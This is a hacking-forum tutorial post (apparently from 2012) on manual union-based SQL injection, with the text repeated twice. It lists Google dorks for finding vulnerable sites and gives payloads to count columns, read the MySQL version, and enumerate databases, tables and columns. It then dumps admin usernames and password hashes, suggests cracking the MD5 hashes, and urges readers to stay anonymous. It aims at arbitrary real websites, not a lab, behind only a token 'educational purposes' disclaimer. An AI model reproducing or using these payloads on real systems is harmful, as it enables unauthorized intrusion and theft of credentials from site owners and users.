[TuT] Manual SQL Injection [TuT] 11-11-2012, 08:02 PM
#1
Manual SQL Injection.
Step 1: Finding a target.
For those new to web hacking, using google dorks can really help. Here's a few:
Click a link, let it load. If it properly loads, put a ' at the end, you will get something similar to this:
Now, take away the ' and add: order by 5--
If you get an error, cool, keep reading anyways. If not, read on-you have to.
Keep adding 5 until you get a screen similar to this:
Next, between the working 5 and the nonworking 5, bump the order by number up by 1 each time (order by 6--, order by 7--, etc.) until it doesn't load or gives an error. Of course, with my luck, I got the error ON error 10. Therefore, there is 9 columns!
Step 3: Find which column is vulnerable.
After id=, put a -
This is important!
Then, type in after the number, union all select 1,2,3,4,5,6,7,8,9--
Obviously, if your site only has 4 columns, it would be union all select 1,2,3,4
You'll be told which column is vulnerable directly.
Example:
Step 4: Get the MySQL version
For the vulnerable column, replace the number with @@version
Example:
From now on, examples will be shown as mine, just modify this to work with your site!
Step 5: Get Databases
Change your info to: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
Then change group_concat(schema_name) to database(), which will give you your current database.
Step 6: Get Tables
Next:
union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
Should give you the table list. Imgur stopped working, so start thinking!;D
I got a table called admin. Hell yes!
Step 7: Get Columns
union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--
I got some columns, one called adminUser and another called adminPassword.
Step 8: Admin Logins!
You're almost done!
union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--
Remember, columns in parentheses, table at end
If you get strings of what looks to be randomized letters and numbers, this is md5, so just google "decrypt md5 online" or get Cain and Abel
From there, I think you know what to do.
This is for educational purposes only. You're responsible for what you do, but remember to stay anonymous!
Zealotry
Step 1: Finding a target.
For those new to web hacking, using google dorks can really help. Here's a few:
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=Click a link, let it load. If it properly loads, put a ' at the end, you will get something similar to this:
Spoiler:
![[Image: iAtBE.jpg]](http://i.imgur.com/iAtBE.jpg)
![[Image: QIn9S.jpg]](http://i.imgur.com/QIn9S.jpg)
Now, take away the ' and add: order by 5--
If you get an error, cool, keep reading anyways. If not, read on-you have to.
Keep adding 5 until you get a screen similar to this:
Spoiler:
![[Image: gbtLX.jpg]](http://i.imgur.com/gbtLX.jpg)
Next, between the working 5 and the nonworking 5, bump the order by number up by 1 each time (order by 6--, order by 7--, etc.) until it doesn't load or gives an error. Of course, with my luck, I got the error ON error 10. Therefore, there is 9 columns!
Step 3: Find which column is vulnerable.
After id=, put a -
This is important!
Then, type in after the number, union all select 1,2,3,4,5,6,7,8,9--
Obviously, if your site only has 4 columns, it would be union all select 1,2,3,4
You'll be told which column is vulnerable directly.
Example:
Spoiler:
![[Image: Qyqwg.jpg]](http://i.imgur.com/Qyqwg.jpg)
Step 4: Get the MySQL version
For the vulnerable column, replace the number with @@version
Example:
Spoiler:
![[Image: wyLyA.jpg]](http://i.imgur.com/wyLyA.jpg)
From now on, examples will be shown as mine, just modify this to work with your site!
Step 5: Get Databases
Change your info to: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
Spoiler:
![[Image: 5stxB.jpg]](http://i.imgur.com/5stxB.jpg)
Then change group_concat(schema_name) to database(), which will give you your current database.
Step 6: Get Tables
Next:
union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
Should give you the table list. Imgur stopped working, so start thinking!;D
I got a table called admin. Hell yes!
Step 7: Get Columns
union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--
I got some columns, one called adminUser and another called adminPassword.
Step 8: Admin Logins!
You're almost done!
union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--
Remember, columns in parentheses, table at end
If you get strings of what looks to be randomized letters and numbers, this is md5, so just google "decrypt md5 online" or get Cain and Abel
From there, I think you know what to do.
This is for educational purposes only. You're responsible for what you do, but remember to stay anonymous!
Zealotry
(This post was last modified: 11-11-2012, 08:03 PM by Dismas.)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
